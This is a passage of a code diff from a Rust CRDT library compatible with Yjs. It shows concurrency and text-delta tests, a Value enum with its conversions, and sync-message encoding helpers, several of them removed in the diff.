text.remove(pos, 6).unwrap();
len.fetch_sub(6, Ordering::SeqCst);
}
}
}));
}
for handle in handles {
handle.join().unwrap();
}
assert_eq!(text.to_string().len(), len.load(Ordering::SeqCst));
assert_eq!(text.len(), len.load(Ordering::SeqCst) as u64);
}
#[test]
#[cfg(not(loom))]
fn test_parallel_ins_del_text() {
// cases that ever broken
// wrong left/right ref
parallel_ins_del_text(973078538, 2, 2);
parallel_ins_del_text(18414938500869652479, 2, 2);
}
#[test]
fn loom_parallel_ins_del_text() {
let seed = rand::rng().random();
let mut rand = ChaCha20Rng::seed_from_u64(seed);
let ranges = (0..20).map(|_| rand.random_range(0..16)).collect::<Vec<_>>();
loom_model!({
let doc = Doc::new();
let mut text = doc.get_or_create_text("test").unwrap();
text.insert(0, "This is a string with length 32.").unwrap();
// enough for loom
let handles = (0..2)
.map(|i| {
let text = text.clone();
let ranges = ranges.clone();
thread::spawn(move || {
let mut text = text.clone();
let ins = i % 2 == 0;
let pos = ranges[i];
if ins {
let str = format!("hello {}", i);
text.insert(pos, &str).unwrap();
} else {
text.remove(pos, 6).unwrap();
}
})
})
.collect::<Vec<_>>();
for handle in handles {
handle.join().unwrap();
}
});
}
#[test]
#[cfg_attr(miri, ignore)]
fn test_recover_from_yjs_encoder() {
let yrs_options = Options {
client_id: rand::random(),
guid: nanoid::nanoid!().into(),
..Default::default()
};
loom_model!({
let binary = {
let doc = yrs::Doc::with_options(yrs_options.clone());
let text = doc.get_or_insert_text("greating");
let mut trx = doc.transact_mut();
text.insert(&mut trx, 0, "hello");
text.insert(&mut trx, 5, " world!");
text.remove_range(&mut trx, 11, 1);
trx.encode_update_v1()
};
// in loom loop
#[allow(clippy::needless_borrow)]
let doc = Doc::try_from_binary_v1(&binary).unwrap();
let mut text = doc.get_or_create_text("greating").unwrap();
assert_eq!(text.to_string(), "hello world");
text.insert(6, "great ").unwrap();
text.insert(17, '!').unwrap();
assert_eq!(text.to_string(), "hello great world!");
});
}
#[test]
fn test_recover_from_octobase_encoder() {
loom_model!({
let binary = {
let doc = Doc::new();
let mut text = doc.get_or_create_text("greating").unwrap();
text.insert(0, "hello").unwrap();
text.insert(5, " world!").unwrap();
text.remove(11, 1).unwrap();
doc.encode_update_v1().unwrap()
};
let doc = Doc::try_from_binary_v1(binary).unwrap();
let mut text = doc.get_or_create_text("greating").unwrap();
assert_eq!(text.to_string(), "hello world");
text.insert(6, "great ").unwrap();
text.insert(17, '!').unwrap();
assert_eq!(text.to_string(), "hello great world!");
});
}
#[test]
fn test_text_delta_insert_format() {
loom_model!({
let doc = Doc::new();
let mut text = doc.get_or_create_text("text").unwrap();
let mut attrs = TextAttributes::new();
attrs.insert("bold".to_string(), Any::True);
text
.apply_delta(&[TextDeltaOp::Insert {
insert: TextInsert::Text("abc".to_string()),
format: Some(attrs.clone()),
}])
.unwrap();
assert_eq!(text.to_string(), "abc");
assert_eq!(
text.to_delta(),
vec![TextDeltaOp::Insert {
insert: TextInsert::Text("abc".to_string()),
format: Some(attrs),
}]
);
});
}
#[test]
fn test_text_delta_retain_format() {
loom_model!({
let doc = Doc::new();
let mut text = doc.get_or_create_text("text").unwrap();
text
.apply_delta(&[TextDeltaOp::Insert {
insert: TextInsert::Text("abc".to_string()),
format: None,
}])
.unwrap();
let mut attrs = TextAttributes::new();
attrs.insert("bold".to_string(), Any::True);
text
.apply_delta(&[TextDeltaOp::Retain {
retain: 1,
format: Some(attrs.clone()),
}])
.unwrap();
assert_eq!(
text.to_delta(),
vec![
TextDeltaOp::Insert {
insert: TextInsert::Text("a".to_string()),
format: Some(attrs),
},
TextDeltaOp::Insert {
insert: TextInsert::Text("bc".to_string()),
format: None,
}
]
);
});
}
#[test]
fn test_text_delta_utf16_retain() {
loom_model!({
let doc = Doc::new();
let mut text = doc.get_or_create_text("text").unwrap();
text
.apply_delta(&[TextDeltaOp::Insert {
insert: TextInsert::Text("😀".to_string()),
format: None,
}])
.unwrap();
let mut attrs = TextAttributes::new();
attrs.insert("bold".to_string(), Any::True);
text
.apply_delta(&[TextDeltaOp::Retain {
retain: 2,
format: Some(attrs.clone()),
}])
.unwrap();
assert_eq!(
text.to_delta(),
vec![TextDeltaOp::Insert {
insert: TextInsert::Text("😀".to_string()),
format: Some(attrs),
}]
);
});
}
}
@@ -1,157 +0,0 @@
use std::fmt::Display;
use super::*;
#[derive(Debug, Clone, PartialEq)]
pub enum Value {
Any(Any),
Doc(Doc),
Array(Array),
Map(Map),
Text(Text),
XMLElement(XMLElement),
XMLFragment(XMLFragment),
XMLHook(XMLHook),
XMLText(XMLText),
}
impl Value {
pub fn to_any(&self) -> Option<Any> {
match self {
Value::Any(any) => Some(any.clone()),
_ => None,
}
}
pub fn to_array(&self) -> Option<Array> {
match self {
Value::Array(array) => Some(array.clone()),
_ => None,
}
}
pub fn to_map(&self) -> Option<Map> {
match self {
Value::Map(map) => Some(map.clone()),
_ => None,
}
}
pub fn to_text(&self) -> Option<Text> {
match self {
Value::Text(text) => Some(text.clone()),
_ => None,
}
}
pub fn from_vec<T: Into<Any>>(el: Vec<T>) -> Self {
Value::Any(Any::Array(el.into_iter().map(|item| item.into()).collect::<Vec<_>>()))
}
}
impl From<&Content> for Value {
fn from(value: &Content) -> Value {
match value {
Content::Any(any) => Value::Any(if any.len() == 1 {
any[0].clone()
} else {
Any::Array(any.clone())
}),
Content::String(s) => Value::Any(Any::String(s.clone())),
Content::Json(json) => Value::Any(Any::Array(
json
.iter()
.map(|item| {
if let Some(s) = item {
Any::String(s.clone())
} else {
Any::Undefined
}
})
.collect::<Vec<_>>(),
)),
Content::Binary(buf) => Value::Any(Any::Binary(buf.clone())),
Content::Embed(v) => Value::Any(v.clone()),
Content::Type(ty) => match ty.ty().unwrap().kind {
YTypeKind::Array => Value::Array(Array::from_unchecked(ty.clone())),
YTypeKind::Map => Value::Map(Map::from_unchecked(ty.clone())),
YTypeKind::Text => Value::Text(Text::from_unchecked(ty.clone())),
YTypeKind::XMLElement => Value::XMLElement(XMLElement::from_unchecked(ty.clone())),
YTypeKind::XMLFragment => Value::XMLFragment(XMLFragment::from_unchecked(ty.clone())),
YTypeKind::XMLHook => Value::XMLHook(XMLHook::from_unchecked(ty.clone())),
YTypeKind::XMLText => Value::XMLText(XMLText::from_unchecked(ty.clone())),
// actually unreachable
YTypeKind::Unknown => Value::Any(Any::Undefined),
},
Content::Doc { guid: _, opts } => Value::Doc(
DocOptions::try_from(opts.clone())
.expect("Failed to parse doc options")
.build(),
),
Content::Format { .. } => unimplemented!(),
// actually unreachable
Content::Deleted(_) => Value::Any(Any::Undefined),
}
}
}
impl From<Value> for Content {
fn from(value: Value) -> Self {
match value {
Value::Any(any) => Content::from(any),
Value::Doc(doc) => Content::Doc {
guid: doc.guid().to_owned(),
opts: Any::from(doc.options().clone()),
},
Value::Array(v) => Content::Type(v.0),
Value::Map(v) => Content::Type(v.0),
Value::Text(v) => Content::Type(v.0),
Value::XMLElement(v) => Content::Type(v.0),
Value::XMLFragment(v) => Content::Type(v.0),
Value::XMLHook(v) => Content::Type(v.0),
Value::XMLText(v) => Content::Type(v.0),
}
}
}
impl<T: Into<Any>> From<T> for Value {
fn from(value: T) -> Self {
Value::Any(value.into())
}
}
impl From<Doc> for Value {
fn from(value: Doc) -> Self {
Value::Doc(value)
}
}
impl Display for Value {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match self {
Value::Any(any) => write!(f, "{any}"),
Value::Text(text) => write!(f, "{text}"),
_ => write!(f, ""),
}
}
}
impl serde::Serialize for Value {
fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
where
S: serde::Serializer,
{
match self {
Self::Any(any) => any.serialize(serializer),
Self::Array(array) => array.serialize(serializer),
Self::Map(map) => map.serialize(serializer),
Self::Text(text) => text.serialize(serializer),
// Self::XMLElement(xml_element) => xml_element.serialize(serializer),
// Self::XMLFragment(xml_fragment) => xml_fragment.serialize(serializer),
// Self::XMLHook(xml_hook) => xml_hook.serialize(serializer),
// Self::XMLText(xml_text) => xml_text.serialize(serializer),
// Self::Doc(doc) => doc.serialize(serializer),
_ => serializer.serialize_none(),
}
}
}
@@ -1,14 +0,0 @@
use super::list::ListType;
use crate::impl_type;
impl_type!(XMLElement);
impl ListType for XMLElement {}
impl_type!(XMLFragment);
impl ListType for XMLFragment {}
impl_type!(XMLText);
impl ListType for XMLText {}
impl_type!(XMLHook);
impl ListType for XMLHook {}
@@ -1,44 +0,0 @@
use super::*;
pub fn encode_awareness_as_message(awareness: AwarenessStates) -> JwstCodecResult<Vec<u8>> {
let mut buffer = Vec::new();
write_sync_message(&mut buffer, &SyncMessage::Awareness(awareness))
.map_err(|e| JwstCodecError::InvalidWriteBuffer(e.to_string()))?;
Ok(buffer)
}
pub fn encode_update_as_message(update: Vec<u8>) -> JwstCodecResult<Vec<u8>> {
let mut buffer = Vec::new();
write_sync_message(&mut buffer, &SyncMessage::Doc(DocMessage::Update(update)))
.map_err(|e| JwstCodecError::InvalidWriteBuffer(e.to_string()))?;
Ok(buffer)
}
pub fn merge_updates_v1<V: AsRef<[u8]>, I: IntoIterator<Item = V>>(updates: I) -> JwstCodecResult<Update> {
let updates = updates
.into_iter()
.map(Update::decode_v1)
.collect::<JwstCodecResult<Vec<_>>>()?;
Ok(Update::merge(updates))
}
/// It tends to generate small numbers.
/// Since the client id will be included in all crdt items, the
/// small client helps to reduce the binary size.
///
/// NOTE: The probability of 36% of the random number generated by
/// this function is greater than [u32::MAX]
pub fn prefer_small_random() -> u64 {
use rand::{distr::Distribution, rng};
use rand_distr::Exp;
let scale_factor = u16::MAX as f64;
let v: f64 = Exp::new(1.0 / scale_factor)
.map(|exp| exp.sample(&mut rng()))
.unwrap_or_else(|_| rand::random());
(v * scale_factor) as u64
}
Binary file not shown.
Binary file not shown.
@@ -1 +0,0 @@
[]

Some files were not shown because too many files have changed in this diff Show More